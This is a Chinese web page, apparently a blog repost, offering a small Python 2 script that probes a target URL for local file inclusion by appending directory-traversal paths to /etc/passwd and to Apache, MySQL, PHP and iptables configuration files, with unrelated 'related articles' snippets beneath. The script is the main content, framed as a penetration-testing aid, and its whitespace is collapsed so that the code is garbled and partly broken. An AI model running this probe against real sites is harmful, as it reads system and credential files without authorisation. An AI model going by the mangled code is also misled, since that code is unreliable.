【python探测本地包含文件的小工具】

操作方法

  • 01

    这几天在学PYTHON,随手写了个这个。 本地包含挨个试文件是否存在的时候很烦的,尤其在找配置文件和WEB路径的时候。PYTHON写点对渗透有帮助的小东西真的很方便。 paths1和paths2这俩变量是保存路径的。。列表如果觉得不够自己可以加!! 代码:importurllib2import sysvar1=0var2=0print("-----------------------------------------------------")print ("|          usage:path.py site url                  |")print ("|this url likehttp://www.google.com/index.?id=  |")print ("       writed byeip_0x[Freebuf],just 4 fun         |")print("-----------------------------------------------------") site0=sys.argv[1]+'/kfdsjkf7675637d.txt'req0=urllib2.Request(site0)conn0=urllib2.urlopen(req0) while1:    data0=conn0.read(4072)    if not len(data0):       break paths1=['/etc/passwd','../etc/passwd','../../etc/passwd','../../../etc/passwd','../../../../etc/passwd','../../../../../etc/passwd','../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../../etc/passwd','../../../../../../../../../etc/passwd','../../../../../../../../../../etc/passwd']paths2=['/usr/local/app/apache2/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/usr/local/app/apache2/conf/extra/httpd-vhosts.conf','/usr/local/app/php5/lib/php.ini','/etc/sysconfig/iptables','/etc/httpd/conf/httpd.conf','/etc/my.cnf','/etc/issue','/etc/redhat-release','/usr/local/apche/conf/httpd.conf','/etc/httpd/conf/httpd.conf'] forpath in paths1:   site=sys.argv[1]+path   req=urllib2.Request(site)  conn=urllib2.urlopen(req)   while 1:       data=conn.read(4072)       if notlen(data0):           break        if len(data)!=len(data0):           printpath," this file has been found!!!!u r lucky and have fun!!!!"        for path2in paths2:           path2ok=path.replace("/etc/passwd",path2)          site2=sys.argv[1]+path2ok           req2=urllib2.Request(site2)          conn2=urllib2.urlopen(req2)           while 1:              data2=conn2.read(4072)               if not len(data2):                  break               if len(data2)!=len(data0):                   printpath2,"this file has been found!!"

(0)

相关推荐

  • 禁用U盘复制文件的小工具

    由于U盘的轻巧方便,容易携带,现在越来越多人使用了,但也正由于它的方便携带给我们的数据安全带来了麻烦,试想一下,在你离开电脑的时候别人用U盘把电脑上的重要资料都复制了,如果是重要的机密,这可就麻烦大了 ...

  • U盘文件夹加密小工具介绍

    U盘的使用已经越来越广泛了,但是使用方便的同时也会带来很多泄密的困扰,于是给U盘加密就变得十分重要了.怎么来给u 盘加密呢?给大家介绍一款软件--"高强度U盘文件夹加密",这款软件 ...

  • 荣耀8桌面整理/壁纸/小工具/风格/导航栏/文件夹

    荣耀8添加或删除空白页面,更换壁纸,添加窗口小工具,设置桌面切换效果,桌面设置,自定义通知栏及图标,更改桌面风格,设置导航栏,创建文件夹#资料课代表 | 讲窍门# 如果有一个干净整洁的桌面,不但看起来 ...

  • pdf文件变小的几种方法 两款pdf变小工具

    当你上传资料时,会遇到对方对文件有大小的限制,有没有方法使pdf文件变小且质量不会有太大影响?今天就介绍两种方法来轻松给pdf文件的瘦身一下.如果文档使用大量图片制作或扫描类的电子书,建议你使用pdf ...

  • 360安全卫士实用小工具:[1]文件粉碎机

    有的时候,想删除电脑中的文件夹或文件,总是提示你不能删除,但是有没有打开该文件或文件夹,怎么办?一般像这种情况,注销系统或重启系统,然后再删除,可以解决,但有的顽固文件,也不一定能奏效,而且这种方法也 ...

  • 迅雷离线下载如何取回文件的小技巧

    迅雷离线下载怎么取回文件的小技巧: 在迅雷应用那里,有个迅雷离线,点进去后选你要取回的资源,然后有个本地取回就行了。一般你在下载过程中,点击离线下载,它离线下载后会自动帮你取回的。 显示云端下载完成等 ...

  • 小工具VirtualBox-虚拟机让你安心体验Win10系统

    10月1日,微软正式公布了Windows 10技术预览版以及相关下载。和Win8/8.1相比,Win10纠正了不少Win8中过于冒进的地方,因此从很早开始就受到用户的关注,相信此时已经有不少用户 开始 ...

  • Google 文档图表小工具自动实时更新技巧

    对于很多做财经工作或者是撰写财经类博客网站,而且经常出差的朋友来说,在外面更新以图表形式存在的博客(或者单位网站协同办公系统)内容并不容易:缺少专业软件大大制约了他们的工作。 如果图表能实时同步自动更 ...

  • Win7预装版桌面小工具TOP5新鲜出炉

    导读:Windows 7已销售4.5亿许可,购买一套正版Win7家庭普通版需要399元人民币,Win7预装版陪伴着小胖和他的朋友家人走过了很多日子,这些日子由Win7 预装版将他们串联起来,组成一组幸 ...